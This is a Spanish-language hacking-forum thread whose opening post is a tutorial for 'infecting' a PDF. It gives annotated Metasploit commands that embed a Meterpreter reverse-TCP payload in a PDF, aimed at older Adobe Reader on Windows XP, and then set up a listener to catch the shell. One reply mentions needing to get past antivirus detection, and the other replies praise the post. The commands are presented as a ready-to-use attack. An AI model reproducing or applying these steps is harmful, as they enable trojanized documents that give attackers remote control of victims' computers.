comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Infectar PDF [Video Tutorial]

  • 4 Respuestas
  • 3040 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Stiuvert

  • *
  • Colaborador
  • *
  • Mensajes: 2668
  • Actividad:
    1.67%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« en: Agosto 24, 2011, 10:15:55 am »
Hola amigos aqui les dejo un vídeo donde se muestra la manipulación del Metasploit para obtener un PDF malintencionado que al abrirlo devuelve una shell que se conectar al atacante. El exploit mencionado afecta a las versiones de Adobe Reader v8.x, v9.x y a Windows XP SP3(2,1,0). Al final explico cada paso que se llevo a cabo en el vídeo:

Video Youtube:




Aquí está el comando y entre corchetes [] la explicación:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Shell - Konsole
use exploit/windows/fileformat/adobe_pdf_embedded_exe [El exploit para ejecutar un el PAYLOAD al abrir un PDF]
set FILENAME nombre_salida.pdf [El nombre que tendrá el PDF una vez modificado por msf]
set INFILENAME /root/nombre_entrada.pdf [El nombre del PDF que será infectado]
set OUTPUTPATH /root/ [Directorio donde se guardará el PDF]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP que estará a la escucha para que se conecte el PAYLOAD]
set LPORT 4455 [Puerto a la escucha]
set id 0 [El S.O. y la versión del Adobe Reader que vulnera el exploit]
exploit

Ya le dijimos al PDF donde se conectara y en que puerto, ahora hay que poner el MSF a la escucha:

Shell - Konsole
back ["Atrás", dejamos de usar el exploit actual]
use exploit/multi/handler [El exploit para recibir a nuestro PAYLOAD]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP de nuestra máquina]
set LPORT 4455 [Puerto donde se conectarán]
set id 0 [Definimos los parametros del exploit]
exploit

Fuente: c-intrud3rs.com
« Última modificación: Marzo 25, 2012, 01:40:45 pm por ANTRAX »

Desconectado k43l

  • *
  • Underc0der
  • Mensajes: 119
  • Actividad:
    0%
  • Reputación 0
  • white & black hacking
    • Ver Perfil
    • White And Black Hacking
« Respuesta #1 en: Agosto 24, 2011, 11:37:24 am »
buen tutorial, sin embargo el archivo infectado o troyanizado si se puede llamar asi es detectado por la mayoria de los AVs, habría que utilizar otro método para pasar esto de largo
salu2




"Mess with the best, die like the rest"

Desconectado Shama|TwoH

  • *
  • Underc0der
  • Mensajes: 19
  • Actividad:
    0%
  • Reputación 0
  • El conocimiento es libre.
    • Ver Perfil
« Respuesta #2 en: Octubre 28, 2011, 02:41:44 pm »
Jooder !! cada me siento mas inseguro navegando..
Saludos.
#####################################################
#######                                Shama|TwoH                         #######
#####################################################

Desconectado The Spartan

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Octubre 28, 2011, 05:15:42 pm »
Muy bueno si señor.  ;D

Desconectado sft_LIUNIX

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
  • Juega con el mejor.. Pierde como los demas
    • Ver Perfil
    • Canal de Youtube
    • Email
« Respuesta #4 en: Abril 07, 2012, 05:38:26 pm »
Muy Buen Aporte brother. sigue asii

Juegas con el mejor... pierde como los demas

 

¿Te gustó el post? COMPARTILO!



Tutorial - "Recuperar datos borrados dispositivo almacenamiento"

Iniciado por Cl0udswX

Respuestas: 7
Vistas: 4243
Último mensaje Octubre 22, 2017, 04:27:09 pm
por b4r7
Breve Tutorial Sobre Ingenieria Social + Algunos Ejemplos

Iniciado por Krau[Z]ereth

Respuestas: 2
Vistas: 5129
Último mensaje Junio 28, 2012, 04:04:06 am
por aura16
DNS Poisoning "Video"

Iniciado por REC

Respuestas: 2
Vistas: 2177
Último mensaje Mayo 26, 2012, 10:06:06 am
por Aryenal.Bt
Super tutorial de comandos MS-DOS(primera parte) by k43l

Iniciado por k43l

Respuestas: 6
Vistas: 4467
Último mensaje Abril 07, 2010, 09:35:17 pm
por k43l
Utilizando BeEF-XSS Framework-Tutorial Español - Backtrack 5 R3

Iniciado por Aryenal.Bt

Respuestas: 2
Vistas: 4715
Último mensaje Febrero 02, 2013, 09:02:37 pm
por Aryenal.Bt